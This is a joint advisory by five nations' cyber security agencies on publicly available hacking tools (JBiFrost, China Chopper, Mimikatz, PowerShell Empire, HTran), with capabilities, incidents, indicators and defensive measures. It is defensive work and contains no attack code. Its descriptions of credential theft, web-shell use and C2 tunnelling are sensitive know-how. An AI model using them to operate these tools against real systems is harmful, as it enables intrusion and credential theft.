National Cleer Security Centre Joint report on publicly available hacking tools Limiting the effectiveness of tools commonly used by malicious actors Page 2 Joint report on publicly available hacking tools Joint report on publicly available hacking tools Page 3 Contents Introduction 4 Nature of the tools 4 Report structure 4 Remote access trojans JBiFrost 5 In use 5 Capabilities 5 Examples 5 Detection and protection 6 Web shells China Chopper 7 In use 7 Capabilities 7 Detection and protection 8 Credential stealers Mimikatz 9 In use 9 Capabilities 9 Examples 10 Detection and protection 10 Lateral movement frameworks PowerShell Empire 12 In use 12 Capabilities 12 Examples 13 Detection and protection 13 C2 obfuscation tools HTran 14 In use 14 Capabilities 14 Examples 15 Detection and protection 15 General detection and prevention measures 16 Page 4 Joint report on publicly available hacking tools Introduction This report is a collaborative research effort by the cyber security authorities of five nations Australia Canada New Zealand the UK and USA1 In it we highlight the use of five publicly-available tools which have been used for malicious purposes in recent cyber incidents around the world To aid the work of network defenders and systems administrators we also provide advice on limiting the effectiveness of these tools and detecting their use on a network Nature of the tools The individual tools we cover in this report are limited examples of the types used by malicious actors You should not consider it an exhaustive list when planning your network defence Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states or criminals on the Dark Web Today hacking tools with a variety of functions are widely and freely available for use by everyone from skilled penetration testers hostile state actors and organised criminals through to amateur hackers These tools have been used to compromise information across a wide range of critical sectors including health finance government and defence Their widespread availability presents a challenge for network defence and actor attribution Experience from all our countries makes it clear that while cyber actors continue to develop their capabilities they still make use of established tools and techniques Even the most sophisticated groups use common publicly-available tools to achieve their objectives Whatever these objectives may be initial compromises of victim systems are often established through exploitation of common security weaknesses Abuse of unpatched software vulnerabilities or poorly configured systems are common ways for an actor to gain access The tools detailed here come into play once a compromise has been achieved enabling attackers to further their objectives within the victim’s systems Report structure The tools detailed fall into five categories remote access trojans RATs web shells credential stealers lateral movement frameworks and command and control C2 obfuscators The report provides an overview of the threat posed by each tool along with insight into where and when it has been deployed by hostile actors Measures to aid detection and limit the effectiveness of each tool are also described The report concludes with general advice for improving network defence practices 1 The Australian Cyber Security Centre ACSC the Canadian Centre for Cyber Security CCCS the New Zealand National Cyber Security Centre NZ NCSC CERT New Zealand the UK National Cyber Security Centre UK NCSC and the US National Cybersecurity and Communications Integration Center NCCIC Joint report on publicly available hacking tools Page 5 Remote access trojans JBiFrost First observed in May 2015 the JBiFrost remote access trojan RAT is a variant of the Adwind RAT with roots stretching back to the Frutas RAT from 2012 A RAT is a programme which once installed on a victim’s machine allows remote administrative control In a malicious context it can among many other functions be used to install backdoors and key loggers take screen shots and exfiltrate data Malicious RATs can be difficult to detect because they are normally designed not to appear in lists of running programmes and can mimic the behaviour of legitimate applications To prevent forensic analysis RATs have been known to disable security measures such as Task Manager and network analysis tools such as Wireshark on the victim's system In use JBiFrost is typically employed by cyber criminals and low-skilled actors but its capabilities could easily be adapted for use by state actors Other RATs are widely used by Advanced Persistent Threat APT groups such as Adwind against the aerospace and defence sector or Quasar RAT by APT10 against a broad range of sectors Malicious actors have also compromised servers with the purpose of delivering malicious RATs to victims either to gain remote access for further exploitation or to steal valuable information such as banking credentials Intellectual Property or PII Capabilities The JBiFrost RAT is Java-based cross-platform and multifunctional It poses a threat to several different operating systems including Windows Linux MAC OS X and Android JBiFrost allows actors to pivot and move laterally across a network or install additional malicious software It is primarily delivered through emails as an attachment usually an invoice notice request for quotation remittance notice shipment notification payment notice or with a link to a file hosting service Past infections have exfiltrated intellectual property banking credentials and Personally Identifiable Information PII Machines infected with JBiFrost can also be used in botnets to carry out Distributed Denial of Service DDoS attacks Examples Since early 2018 we have observed an increase in JBiFrost being used in targeted attacks against critical national infrastructure owners and their supply chain operators There has also been an increase in the RAT’s hosting on infrastructure located in our countries In early 2017 the Adwind RAT was deployed via spoofed emails designed to look as if they originated from SWIFT network services Page 6 Joint report on publicly available hacking tools Many other publicly available RATs including variations of the Gh0st RAT have also been observed in use against a range of victims worldwide Detection and protection Some possible indications of a JBiFrost RAT infection can include but are not limited to • inability to restart the computer in safe mode • inability to open the Windows registry editor or task manage • significant increase in disk activity and or network traffic • connection attempts to known malicious IP addresses • creation of new files and directories with obfuscated or random names Protection is best afforded by ensuring systems and installed applications are all fully patched and updated The use of a modern antivirus program with automatic definition updates and regular system scans will also help ensure that most of the latest variants are stopped in their tracks You should ensure that your organisation is able to collect antivirus detections centrally across its estate and investigate RAT detections efficiently Strict application whitelisting is recommended to prevent infections occurring The initial infection mechanism for RATs including JBiFrost can be via phishing emails You can help prevent JBiFrost infections by stopping these phishing emails from reaching your users helping users to identify and report phishing emails and implementing security controls so that the malicious email doesn’t compromise your devices For further details see the NCSC's latest phishing guidance2 2 https www ncsc gov uk phishing Joint report on publicly available hacking tools Page 7 Web shells China Chopper China Chopper is a publicly available well-documented web shell in widespread use since 2012 Web shells are malicious scripts which are uploaded to a target host after an initial compromise and grant an actor remote administrative capability Once this access is established web shells can also be used to pivot to further hosts within a network In use The China Chopper web shell is extensively used by hostile actors to remotely access compromised web-servers where it provides file and directory management along with access to a virtual terminal on the compromised device As China Chopper is just 4 Kb in size and has an easily modifiable payload detection and mitigation is difficult for network defenders Capabilities The China Chopper web shell has two main components the China Chopper client which is run by the attacker and the China Chopper server which is installed on the victim web server but is also attacker-controlled The web shell client can issue terminal commands and manage files on the victim server Its MD5 hash is publicly available3 Web Shell Client MD5 Hash caidao exe 5001ef50c7e869253a7c152a638eab8a The web shell server is uploaded in plain text and can easily be changed by the attacker This makes it is hard to define a specific hash that can identify adversary activity In summer 2018 threat actors were observed targeting public-facing web servers vulnerable to CVE-2017-3066 The activity was related to a vulnerability in the web application development platform Adobe ColdFusion which enabled remote code execution China Chopper was intended as the second-stage payload delivered once servers had been compromised allowing the attacker remote access to the victim host After successful exploitation of a vulnerability on the victim machine the text-based China Chopper is placed on the victim web server Once uploaded the web shell server can be accessed by the attacker at any time using the client application Once successfully connected the attacker proceeds to manipulate files and data on the web server 3 Originally posted on hxxp www maicaidao com Page 8 Joint report on publicly available hacking tools Capabilities include uploading and downloading files to and from the victim using the fileretrieval tool 'wget' to download files from the internet to the target and editing deleting copying renaming and even changing the timestamp of existing files Detection and protection The most powerful defence against a web shell is to avoid the web server being compromised in the first place Ensure that all the software running on public facing web servers is up to date with security patches applied Audit custom applications for common web vulnerabilities4 One attribute of China Chopper is that every action generates an HTTP POST This can be noisy and easily spotted if investigated by a network defender While the China Chopper web shell server upload is plain text commands issued by the client are Base64 encoded although this is easily decodable The adoption of Transport Layer Security TLS by web servers has resulted in web server traffic becoming encrypted making detection of China Chopper activity using network-based tools more challenging The most effective way to detect and mitigate China Chopper is on the host itself specifically on public-facing web servers There are simple ways to search for the presence of the web shell using the command line on both Linux and Windows based operating systems5 To detect web shells more broadly network defenders should focus on spotting either suspicious process execution on web servers for example PHP binaries spawning processes or out of pattern outbound network connections from web servers Typically web servers make predictable connections to an internal network Changes in those patterns may indicate the presence of a web shell You can manage network permissions to prevent web-server processes from writing to directories where PHP can be executed or from modifying existing files We also recommend that you use web access logs as a source of monitoring for example through traffic analytics Observing new unexpected pages or changes in traffic patterns can act as an early indicator 4 5 https www owasp org index php Category OWASP_Top_Ten_Project A range of useful commands and signatures for tracking China Chopper can be found at www fireeye com blog threat-research 2013 08 breaking-down-the-china-chopper-web-shell-part-ii html Joint report on publicly available hacking tools Page 9 Credential stealers Mimikatz Developed in 2007 Mimikatz is mainly used by attackers to collect the credentials of other users logged in to a targeted Windows machine It does this by accessing the credentials in memory within a Windows process called Local Security Authority Subsystem Service LSASS These credentials either plain text or in hashed form can be reused to give access to other machines on a network Although it was not originally intended as a hacking tool in recent years Mimikatz has been used by multiple actors for malicious purposes Its use in compromises around the world has prompted organisations globally to re-evaluate their network defences Mimikatz is typically used by malicious actors once access has been gained to a host and the actor wishes to move throughout the internal network Its use can significantly undermine poorly configured network security In use Mimikatz source code is publicly available which means anyone can compile their own versions of the tool and potentially develop new custom plug-ins and additional functionality Our cyber authorities have observed widespread use of Mimikatz among hostile actors including organised crime and state-sponsored groups Once a malicious actor has gained local admin privileges on a host Mimikatz provides the ability to obtain the hashes and clear-text credentials of other users enabling the actor to escalate privileges within a domain and perform many other post-exploitation and lateral movement tasks For this reason Mimikatz has been bundled into other penetration testing and exploitation suites such as PowerShell Empire and Metasploit Capabilities Mimikatz is best known for its ability to retrieve clear text credentials and hashes from memory but its full suite of capabilities is extensive The tool can obtain LAN Manager and NTLM hashes certificates and long-term keys on Windows XP 2003 through to Windows 8 1 2012 R2 In addition it can perform pass-thehash or pass-the-ticket tasks and build Kerberos Golden Tickets Many features of Mimikatz can be automated with scripts such as PowerShell allowing an actor to rapidly exploit and traverse a compromised network Furthermore when operating in memory through the freely available yet powerful 'Invoke-Mimikatz' PowerShell script Mimikatz activity is very difficult to isolate and identify Page 10 Joint report on publicly available hacking tools Examples Mimikatz has been used across multiple incidents by a broad range of actors for several years In 2011 it was used by unknown hackers to obtain administrator credentials from the Dutch certificate authority DigiNotar The rapid loss of trust in DigiNotar led to the company filing for bankruptcy within a month of this compromise More recently Mimikatz was used in conjunction with other hacking tools in the 2017 NotPetya and BadRabbit ransomware attacks to extract administrator credentials held on thousands of computers These credentials were used to facilitate lateral movement and enabled the ransomware to propagate throughout networks encrypting the hard drives of numerous systems where these credentials were valid In addition a Microsoft research team identified use of the tool during a sophisticated cyberattack targeting several high-profile technology and financial organisations In combination with several other tools and exploited vulnerabilities Mimikatz was used to dump and likely reuse system hashes Detection and protection Updating Windows will help reduce the information available to an actor from the Mimikatz tool as Microsoft seeks to improve the protection offered in each new Windows version To prevent Mimikatz credential retrieval defenders should disable the storage of clear text passwords in LSASS memory This is default behaviour for Windows 8 1 Server 2012 R2 and later but can be specified on older systems which have the relevant security patches installed6 Windows 10 and Windows Server 2016 systems can be protected by using newer security features such as Credential Guard Credential Guard will be enabled by default if • the hardware meets Microsoft’s Windows Hardware Compatibility Programme Specifications and Policies for Windows Server 2016 and Windows Server SemiAnnual Branch • the server is not acting as a Domain Controller You should verify that your physical and virtualised servers meet Microsoft’s minimum requirements for each release of Windows 10 and Windows Server7 Password reuse across accounts particularly administrator accounts makes pass-the-hash attacks far simpler You should set user policies within your organisation which discourage password reuse even across common level accounts on a network The freely available Local Admin Password Solution LAPS from Microsoft can allow easy management of local admin passwords preventing the need to set and store passwords manually 6 https support microsoft com en-us help 2871997 microsoft-security-advisory-update-to-improvecredentials-protection-a 7 https docs microsoft com en-us windows security identity-protection credential-guard credential-guardrequirements Joint report on publicly available hacking tools Page 11 Network administrators should monitor and respond to unusual or unauthorised account creation or authentication to prevent Golden Ticket exploitation or network persistence and lateral movement For Windows tools such as Microsoft ATA and Azure ATP can help with this Network administrators should ensure that systems are patched and up to date Numerous Mimikatz features are mitigated or significantly restricted by the latest system versions and updates But no update is a perfect fix as Mimikatz is continually evolving and new third party modules are often developed Most up-to-date antivirus tools will detect and isolate non-customised Mimikatz use and should therefore be in use to detect these instances But hostile actors can sometimes circumvent antivirus systems by running the tool in memory or by slightly modifying the original code of the tool Wherever Mimikatz is detected you should perform a rigorous investigation as it almost certainly indicates an actor actively present in the network rather than an automated process at work Several features of Mimikatz rely on exploitation of administrator accounts Therefore you should ensure that administrator accounts are issued on an as-required basis only Where administrative access is required you should apply Privilege Access Management principles Since Mimikatz can only capture the accounts of those logged into a compromised machine privileged users such as domain admins should avoid logging into machines with their privileged credentials Detailed information on securing Active Directory is available from Microsoft8 Network defenders should audit the use of scripts particularly PowerShell and inspect logs to identify anomalies This will aid identification of Mimikatz or pass-the-hash abuse as well as providing some mitigation against attempts to bypass detection software 8 https docs microsoft com en-us windows-server identity ad-ds plan security-best-practices best-practicesfor-securing-active-directory Page 12 Joint report on publicly available hacking tools Lateral movement frameworks PowerShell Empire PowerShell Empire is an example of a post exploitation or lateral movement tool It is designed to allow an attacker or penetration tester to move around a network after gaining initial access Other examples of these tools include Cobalt Strike and Metasploit Empire can also be used to generate malicious documents and executables for social engineering access to networks The PowerShell Empire framework Empire was designed as a legitimate penetration testing tool in 2015 Empire acts as a framework for continued exploitation once an attacker has gained access to a system The tool provides an attacker with the ability to escalate privileges harvest credentials exfiltrate information and move laterally across a network These capabilities make it a powerful exploitation tool Because it is built on a common legitimate application PowerShell and can operate almost entirely in memory Empire can be difficult to detect on a network using traditional antivirus tools In use PowerShell Empire has become increasingly popular among hostile state actors and organised criminals In recent years we have seen it used in cyber incidents globally across a wide range of sectors Initial exploitation methods vary between compromises and actors can configure the Empire Framework uniquely for each scenario and target This in combination with the wide range of skill and intent within the Empire user community means that ease of detection will vary Nonetheless having a greater understanding and awareness of this tool is a step forward in defending against its use by malicious actors Capabilities Empire enables an attacker to carry out a range of actions on a victim’s machine and implements the ability to run PowerShell scripts without needing ‘powershell exe’ to be present on the system Its communications are encrypted and its architecture flexible Empire uses ‘modules’ to perform more specific malicious actions These provide attackers with a customisable range of options to pursue their goals on the victim's systems These include escalation of privileges credential harvesting host enumeration key-logging and the ability to move laterally across a network Empire’s ease of use flexible configuration and ability to evade detection make it a popular choice for actors of varying abilities Joint report on publicly available hacking tools Page 13 Examples During an incident in February 2018 a UK energy sector company was compromised by an unknown actor This compromise was detected through Empire’s beaconing activity using the tool's default profile settings Weak credentials on one of the victim’s administrator accounts are believed to have provided the actor with initial access to the network In early 2018 an unknown actor used Winter Olympics themed socially engineered emails and malicious attachments in a spear phishing campaign targeting several South Korean organisations This attack had an additional layer of sophistication making use of InvokePSImage a tool that will encode any PowerShell script into an image In December 2017 the hostile actor APT19 targeted a multinational law firm with a targeted phishing campaign APT19 used obfuscated PowerShell macros embedded within Word documents generated by Empire Our cyber security authorities are also aware of Empire being used to target academia In one reported instance an actor attempted to use Empire to gain persistence using a Windows Management Instrumentation WMI event consumer However in this instance the Empire agent was unsuccessful in establishing network connections due to the HTTP connections being blocked by a local security appliance Detection and protection Identifying malicious PowerShell activity can be difficult due to the prevalence of legitimate PowerShell on hosts and its increased use in maintaining a corporate environment To identify potentially malicious scripts PowerShell activity should be comprehensively logged This should include script block logging and PowerShell transcripts Older versions of PowerShell should be removed from environments to ensure that they cannot be used to circumvent additional logging and controls added in more recent versions of PowerShell The Digital Shadows blog9 provides a good summary of PowerShell security practices The code integrity features in recent versions of Windows can be used to limit the functionality of PowerShell preventing or hampering malicious PowerShell in the event of a successful intrusion A combination of script code signing application whitelisting and constrained language mode will prevent or limit the effect of malicious PowerShell in the event of a successful intrusion These controls will also impact legitimate scripts and it is strongly advised that they be thoroughly tested before deployment When organisations profile their PowerShell usage they often find it is only used legitimately by a small number of technical staff Establishing the extent of this legitimate activity will make it easier to monitor and investigate suspicious or unexpected PowerShell usage elsewhere on the network 9 https www digitalshadows com blog-and-research powershell-security-best-practices Page 14 Joint report on publicly available hacking tools C2 obfuscation tools HTran Attackers will often want to disguise their location when compromising a target To do this they may use generic privacy tools such as TOR or more specific tools to obfuscate their location HUC Packet Transmitter HTran is a proxy tool used to intercept and redirect Transmission Control Protocol TCP connections from the local host to a remote host This makes it possible to obfuscate an attacker's communications with victim networks The tool has been freely available on the internet since at least 2009 HTran facilitates TCP connections between the victim and a hop point controlled by an attacker Malicious cyber actors can use this technique to redirect their packets through multiple compromised hosts running HTran to gain greater access to hosts in a network In use The use of HTran has been regularly observed in compromises of both government and industry targets A broad range of cyber actors have been observed using HTran and other connection proxy tools to • evade intrusion and detection systems on a network • blend in with common traffic or leverage domain trust relationships to bypass security controls • obfuscate or hide C2 infrastructure or communications • create peer-to-peer or meshed C2 infrastructure to evade detection and provide resilient connections to infrastructure Capabilities HTran can run in several modes each of which forwards traffic across a network by bridging two TCP sockets They differ in terms of where the TCP sockets are initiated from either locally or remotely The three modes are • Server listen – Both TCP sockets initiated remotely • Client slave – Both TCP sockets initiated locally • Proxy tran – One TCP socket initiated remotely the other initiated locally upon receipt of traffic from the first connection HTran can inject itself into running processes and install a rootkit to hide network connections from the host operating system Using these features also creates Windows registry entries to ensure that HTran maintains persistent access to the victim network Joint report on publicly available hacking tools Page 15 Examples Recent investigations by our cyber security authorities have identified the use of HTran to maintain and obfuscate remote access to targeted environments In one incident the attacker compromised externally facing web servers running outdated and vulnerable web applications This access enabled the upload of web shells which were then used to deploy other tools including HTran HTran was installed into the ProgramData directory and other deployed tools were used to reconfigure the server to accept Remote Desktop Protocol RDP communications The actor issued a command to start HTran as a client initiating a connection to a server located on the internet over port 80 which forwards RDP traffic from the local interface In this case HTTP was chosen to blend in with other traffic that was expected to be seen originating from a web server to the internet Other well-known ports used included • port 53 – DNS • port 443 - HTTP over TLS SSL • port 3306 - MySQL By using HTran in this way the actor was able to use RDP for several months without being detected Detection and protection Attackers need access to a machine to install and run HTran so network defenders should apply security patches and use good access control to prevent attackers installing malicious applications Network monitoring10 and firewalls can help prevent and detect unauthorised connections from tools such as HTran In some of the samples analysed the rootkit component of HTran only hides connection details when the proxy mode is used When client mode is used defenders can view details about the TCP connections being made HTran also includes a debugging condition that is useful for network defenders In the event that a destination becomes unavailable HTran generates an error message using the following format sprint buffer “ SERVER connection to %s %d error r n” host port2 This error message is relayed to the connecting client in the clear Defenders can monitor for this error message to potentially detect HTran instances active in their environments 10 https www ncsc gov uk guidance introduction-logging-security-purposes Page 16 Joint report on publicly available hacking tools General detection and prevention measures There are several measures that will improve the overall cyber security of your organisation and help protect it against the types of tools highlighted by this report Network defenders are advised to seek further information using the links below Protecting your organisation from malware small business guide https www ncsc gov uk guidance protecting-your-organisation-malware Board toolkit five question for your board’s agenda https www ncsc gov uk guidance board-toolkit-five-questions-your-boards-agenda Use multi-factor authentication 2-factor authentication two-step authentication to reduce the impact of password compromises See NCSC guidance https www ncsc gov uk guidance multi-factor-authentication-online-services https www ncsc gov uk guidance setting-two-factor-authentication-2fa Protect your devices and networks by keeping them up to date use the latest supported versions apply security patches promptly use antivirus and scan regularly to guard against known malware threats See NCSC Guidance https www ncsc gov uk guidance mitigatingmalware Prevent and detect lateral movement in your organisation’s networks See NCSC Guidance https www ncsc gov uk guidance preventing-lateral-movement Implement architectural controls for network segregation See NCSC Guidance https www ncsc gov uk guidance 10-steps-network-security Protect the management interfaces of your critical operational systems In particular use browse-down architecture to prevent attackers easily gaining privileged access to your most vital assets See NCSC blog post https www ncsc gov uk blogpost protect-your-management-interfaces Set up a security monitoring capability so you are collecting the data that will be needed to analyse network intrusions See NCSC Guidance https www ncsc gov uk guidance introduction-logging-securitypurposes Review and refresh your incident management processes See NCSC Guidance https www ncsc gov uk guidance 10-steps-incident-management Update your systems and software Ensure your operating system and productivity apps are up to date Users with Office 365 licensing can use 'click to run' to keep their office applications seamlessly updated Use modern systems and software These have better security built-in If you cannot move off out-of-date platforms and applications straight away there are short term steps you can take to improve your position See NCSC Guidance https www ncsc gov uk guidance obsolete-platforms-security Manage bulk personal datasets properly See NCSC Guidance https www ncsc gov uk guidance protecting-bulk-personal-dataintroduction Joint report on publicly available hacking tools Page 17 Restrict intruders' ability to move freely around your systems and networks Pay particular attention to potentially vulnerable entry points eg third-party systems with onward access to your core network During an incident disable remote access from thirdparty systems until you are sure they are clean See NCSC Guidance https www ncsc gov uk guidance preventing-lateral-movement and https www ncsc gov uk guidance assessing-supply-chain-security Whitelist applications If supported by your operating environment consider whitelisting of permitted applications This will help prevent malicious applications from running See NCSC Guidance https www ncsc gov uk guidance eud-security-guidance-windows-101709#applicationwhitelistingsection Manage macros carefully Disable Office macros except in the specific apps where they are required only enable macros for users that need them day-to-day use a recent and fully patched version of Office and the underlying platform ideally configured in line with the NCSC’s EUD Security Guidance See NCSC Guidance https www ncsc gov uk guidance end-user-device-security and https www ncsc gov uk guidance macro-security-microsoft-office Use antivirus Keep any antivirus software up to date and consider use of a cloud-backed antivirus product that can benefit from the economies of scale this brings Ensure that it is also capable of scanning MS Office macros See NCSC Guidance https www ncsc gov uk guidance macrosecurity-microsoft-office Layer phishing defences Detect and quarantine as many malicious email attachments and spam as possible before they reach your end users Multiple layers of defence will greatly cut the chances of a compromise Treat people as your first line of defence Tell staff how to report suspected phishing emails and ensure they feel confident to do so Investigate their reports promptly and thoroughly Never punish users for clicking phishing links or opening attachments See NCSC Guidance https www ncsc gov uk phishing Deploy a host-based intrusion detection system A variety of products are available free and paid-for to suit different needs and budgets Defend your systems and networks against denial of service attacks See NCSC Guidance https www ncsc gov uk guidance denial-service-dos-guidancecollection Defend your organisation from ransomware Keep safe backups of important files protect from malware and don’t pay the ransom – it may not get your data back See NCSC Guidance https www ncsc gov uk guidance mitigating-malware https www ncsc gov uk guidance backing-your-data Make sure you are handling personal data appropriately and securely https www ncsc gov uk guidance gdpr-security-outcomes Further information Invest in preventing malware-based attacks across various scenarios See NCSC Guidance https www ncsc gov uk guidance mitigating-malware Page 18 Joint report on publicly available hacking tools See also the following advice from our international partners • ACSC Strategies https acsc gov au infosec mitigationstrategies htm • ACSC Essential Eight https acsc gov au publications protect essential-eightexplained htm • CCCS Top 10 Security Actions https cyber gc ca en top-10-it-security-actions • CCCS Cyber Hygiene https cyber gc ca en guidance cyber-hygiene • CERT NZ’s critical controls 2018 https www cert govt nz it-specialists criticalcontrols • CERT NZ’s Top 11 cyber security tips for your business https www cert govt nz businesses-and-individuals guides cyber-security-yourbusiness top-11-cyber-security-tips-for-your-business • NCSC NZ Resources https www ncsc govt nz resources • New Zealand Information Security Manual https www gcsb govt nz the-nzinformation-security-manual • NCCIC Tip Handling Destructive Malware https www us-cert gov ncas tips ST13003 • NCCIC Tip Supplementing Passwords https www us-cert gov ncas tips ST05-012 • NCCIC Tip Understanding Patches https www us-cert gov ncas tips ST04-006 • NCCIC Tip Understanding Antivirus https www us-cert gov ncas tips ST04-005 • NCCIC Tip Protecting Your Privacy https www us-cert gov ncas tips ST04-013 Joint report on publicly available hacking tools Page 19 National Cyber Security Centre Joint report on publicly available hacking tools Limiting the effectiveness of tools commonly used by malicious actors